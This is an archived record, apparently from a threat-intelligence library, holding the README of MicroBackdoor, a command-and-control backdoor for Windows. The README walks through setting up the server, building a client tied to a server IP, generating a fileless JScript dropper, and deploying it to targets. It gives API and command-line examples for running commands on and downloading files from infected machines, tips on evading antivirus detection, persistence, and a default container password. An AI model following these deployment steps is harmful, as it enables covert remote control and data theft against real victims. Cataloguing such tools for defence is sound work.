{
	"id": "bafa263b-1aa5-42be-8d78-65977e3c09aa",
	"created_at": "2026-04-06T00:19:38.927728Z",
	"updated_at": "2026-04-10T03:21:15.235896Z",
	"deleted_at": null,
	"sha1_hash": "d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4",
	"title": "GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for Windows targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 781448,
	"plain_text": "GitHub - Cr4sh/MicroBackdoor: Small and convenient C2 tool for\r\nWindows targets\r\nBy Cr4sh\r\nArchived: 2026-04-05 20:14:46 UTC\r\nMicro Backdoor for Windows\r\nMicro Backdoor is C2 tool for Windows targets with easy customizable code base and small footprint. Micro\r\nBackdoor consists from server, client and dropper. It wasn't designed as replacement for your favorite post-exploitation tools but rather as really minimalistic thing with all of the basic features in less than 5000 lines of\r\ncode, client DLL size is less than 20Kb without compression.\r\nI'm using Micro Backdoor mostly for demonstration purposes as payload for my firmware rootkits and various\r\nlow level persistence techniques. Its code was written in couple of nights, so, it might contain bugs and\r\nvulnerabilities: use it only for your own risk.\r\nGeneral information\r\nWeb interface screenshots\r\nConfiguring the server\r\nUsing Python API\r\nDeploying the server\r\nBuilding Docker container\r\nConfiguring the client\r\nGeneral information\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 1 of 10\n\nMicro Backdoor client supports 32-bit and 64-bit versions of Windows XP, Vista, 7, 8, 8.1, 10, Server 2003,\r\nServer 2003 R2, Server 2008, Server 2008 R2, Server 2012, Server 2012 R2, Server 2016 and Server 2019 of any\r\neditions, languages and service packs.\r\nKey features of the Micro Backdoor:\r\nClient dropper is written in Microsoft JScript which makes it extremely convenient for obfuscation: once\r\nAV starts to detect the dropper you easily can modify its code or apply existing JScript obfuscation tools.\r\nClient can detect SOCKS 4, SOCKS 5 or HTTP proxy server configuration in the system settings and\r\nconnect to the server over this proxy.\r\nIn order to communicate with the server Micro Backdoor client is using end-to-end encrypted protocol with\r\nRSA authentication and random session key.\r\nClient dropper is not creating any executable files on the disk: its body is stored inside Windows registry\r\nvalues which reduces backdoor footprint and makes it more stealth.\r\nBackdoor server is written in Python and can be used on any operating system. It provides clean and\r\nsimple web interface which allows to interact with connected clients in convenient way. Redis database is\r\nused to store clients state.\r\nBackdoor server keeps track of all events for clients and server in the log files.\r\nFor each connected client Micro Backdoor provides semi-interactive command shell running in the web\r\nbrowser.\r\nMicro Backdoor has convenient file manager which allows to browse client file system, download and\r\nupload the files.\r\nFull Unicode and native languages support by both client and server.\r\nBackdoor server is also providing Python API and command line interface to perform any actions with\r\nconnected clients which is useful for automation and scripting.\r\nWeb interface screenshots\r\nMain web interface page with connected clients list:\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 2 of 10\n\nCommand shell page:\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 3 of 10\n\nFile manager page:\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 4 of 10\n\nConfiguring the server\r\nMicro Backdoor server code is located in ./server directory, you have to upload its contents to the remote\r\nmachine where you planning to run the server.\r\nDirectory contents:\r\nserver.py − Server executable file\r\nconfig.py − Server configuration file\r\naccess.log − Access log of embedded web server used for admin interface\r\nserver.log − Server log file with messages related to connected clients\r\nserver.crt − Server RSA certificate used to encrypt client communication\r\nserver.key − Server RSA private key, see above\r\ndownloads/ − Directory to store files downloaded from the clients\r\nlogs/ − Directory with individual command line history files for each client\r\nstatic/ − Directory with static files needed for admin interface\r\nPython program server.py has a lot of command line options used to configure and manage the server, interact\r\nwith connected clients, etc. Here’s how to get to get the server running:\r\n1. Install needed dependencies:\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 5 of 10\n\n$ sudo apt-get install build-essential swig libssl-dev python python-dev python-setuptools python-pip\r\n$ sudo pip install m2crypto pycrypto redis cherrypy defusedxml\r\n2. Install and run Redis database server:\r\n$ sudo apt-get install redis-server\r\n$ sudo service redis-server start\r\n3. Edit config.py file and change default values of HTTP_USERS and HTTP_PATH to secure your server\r\ninstallation.\r\n4. Generate RSA key pair for new installation of the server, it will create server.crt and server.key\r\nfiles:\r\n5. Run the server as background process:\r\n6. Shutdown the server:\r\nAlternatively, you can run server.py with no command line options specified to start the server as interactive\r\nshell process (useful for debugging). After the server was started you can open admin interface in the web\r\nbrowser, its URL is composed from HTTP_ADDR , HTTP_PORT and HTTP_PATH options of config.py\r\nconfiguration file.\r\nAlso, there’s some options to interact with connected clients from the command line.\r\nRetrieve and print list of the currently connected clients:\r\nExecute some command on the connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --exec \u003ccommand\u003e\r\nUpload some file to the connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --fput \u003cremote_path\u003e --file \u003clocal_path\u003e\r\nDownload some file from the connected client:\r\n$ ./server.py --client \u003cclient_ID\u003e --fget \u003cremote_path\u003e --file \u003clocal_path\u003e\r\nUpdate Micro Backdoor on the client:\r\n$ ./server.py --client \u003cclient_ID\u003e --update \u003cdropper_path\u003e\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 6 of 10\n\nUsing Python API\r\nAs it was mentioned above, Micro Backdoor server is also providing Python API to interact with connected clients\r\nwhich is quite useful for automation and scripting purposes. Here's some examples how to use this API.\r\nObtain and print connected clients list:\r\nfrom server import ClientHelper\r\n# get clients list\r\nclients = ClientHelper().client_list()\r\nfor client in clients:\r\n # print client information\r\n print('ID = %s, addr = %s' % (client.client_id, client.addr[0]))\r\nExecute console command on the client:\r\n# create client helper instance\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# execute console command\r\noutput, exit_code = client.execute('whoami')\r\n# execute console command and redirect its output into the stream\r\nclient.execute('whoami', stream = sys.stdout)\r\nWork with the file system of the client:\r\n# create client helper instance\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# download file from the client\r\nclient.file_get('C:\\\\Windows\\\\win.ini', 'win.ini')\r\n# upload file to the client\r\nclient.file_put('C:\\\\Users\\\\Test\\\\example.txt', 'example.txt')\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 7 of 10\n\n# enumerate files in some directory\r\nfor size, name in client.file_list('C:\\\\Windows'):\r\n if size is None:\r\n # print directory name\r\n print(' DIR: %s' % name)\r\n else\r\n # print file name and size\r\n print('FILE: %s [%d bytes]' % (name, size))\r\nExecute WMI queries on the client:\r\n# create client helper instance\r\nclient = ClientHelper(client_id)\r\n# connect to the corresponding child process of the server\r\nclient.mapper_connect()\r\n# get CIM_OperatingSystem WMI class\r\nfor name, value in client.execute_wmi('os').items():\r\n # print class member name and value\r\n print('%s = %s' % (name, value))\r\n# get only \"Caption\" class member value\r\nos_name = client.execute_wmi('os', props = 'Caption')\r\nDeploying the server\r\nFor easy deployment of Micro Backdoor server there's Fabric scenario located in fabfile.py Python script. To\r\ndeploy the server to the remote Linux host you have to perform the following steps.\r\n1. Edit .ssh_config file located in the project directory and add your server information there, for example:\r\nHost my-server\r\n HostName my-server.net\r\n Port 22\r\n User user\r\n IdentityFile ~/.ssh/id_rsa\r\n2. Run ./server.py --keys on your local machine to generate RSA key pair for secure communication\r\nbetween Micro Backdoor client and server.\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 8 of 10\n\n3. Run fab deps:host=my-server command to connect to the remote host my-server over the SSH and\r\ninstall needed dependencies.\r\n4. Run fab deploy:host=my-server command to copy needed files to the remote host my-server and run\r\nthe server.\r\n5. You also can run fab stop to stop running server, fab start to start it and fab uninstall to\r\nshutdown and remove its files form the remote host.\r\nBuilding Docker container\r\nYou also can run Micro Backdoor server inside Docker container with SSH and Redis servers included. To install\r\ndocker on Ubuntu just run sudo apt-get install docker.io , for others distributives and operating systems\r\nplease refer to official documentation.\r\nBefore building the container you need to run ./server.py --keys on your local machine to generate RSA key\r\npair for secure communication between Micro Backdoor client and server. Then you have to cd into the docker\r\ndirectory and run make to build docker image and start the container. To stop running container you can press\r\nCtrl+C and use make start / make stop commands to run it in the background, make rm to remove container\r\nand make rmi to remove image. To ssh into the running container run make shell and enter the password\r\nspecified in docker/makefile.conf file (\"acab\" without quotes by default).\r\nNOTE: Before building docker container please ensure that exposed TCP ports specified in\r\ndocker/makefile.conf are the same as CLIENT_PORT and HTTP_PORT port numbers specified in config.py of\r\nthe server.\r\nConfiguring the client\r\nMicro Backdoor client consists from the binary part used to implement backdoor functionality and JScript\r\nwrapper combined with the shellcode used to run and deliver the binary part in file-less way.\r\n⚠️ JScript and PowerShell code used in client dropper is easily detectable by most of AV/EDR products,\r\nyou should consider to modify it or use other methods to deliver the binary part of the client\r\nFirst, you have to configure the binary using ./client_builder.py command line program, it operates with\r\ndefault configuration specified in ./server/config.py file mentioned in previous part of the document.\r\nInstall Python pefile library:\r\nConfigure the client binary:\r\n$ ./client_builder.py client.dll [server_IP]\r\nAlso, you can specify client_amd64.dll file to use x86_64 version of the client, or\r\nclient_debug.dll / client_amd64_debug.dll to use debug build of the client that prints diagnostic messages\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 9 of 10\n\ninto the standard Windows debug output. Before running client_builder.py you need to generate RSA key pair,\r\nsee Configuring the server section of this document.\r\nYou can use configured client binary with your own delivery tool: exploit, reflective loader, etc. Or you can\r\ngenerate JScript client dropper:\r\n$ ./client_encoder.py dll_inject_script client.dll \u003e dropper.js\r\nPlease note, that JScript/PowerShell reflective loader generated by client_encoder.py is working only with 32-\r\nbit versions of the client binary on both 32-bit and 64-bit Windows targets. 64-bit client binaries are provided only\r\nfor convenience in case if you need to use them with your own loaders and tools.\r\nAfter the dropper.js was generated you can deploy it on your targets. In Windows command line you can run\r\nJScript files by running cscript.exe dropper.js . Or you can just double click JS file in Windows Explorer to\r\nrun the dropper. Micro Backdoor client provides persistence within current user account used to run the dropper, it\r\ncan work with any privileges and medium integrity level.\r\nDeveloped by\r\nDmytro Oleksiuk (aka Cr4sh)\r\ncr4sh0@gmail.com\r\nhttp://blog.cr4.sh\r\n@d_olex\r\nSource: https://github.com/cr4sh/microbackdoor\r\nhttps://github.com/cr4sh/microbackdoor\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/cr4sh/microbackdoor"
	],
	"report_names": [
		"microbackdoor"
	],
	"threat_actors": [],
	"ts_created_at": 1775434778,
	"ts_updated_at": 1775791275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.pdf",
		"text": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.txt",
		"img": "https://archive.orkl.eu/d4b7cea45a61e93a4fcb2ae2e2f8022c1e7da2f4.jpg"
	}
}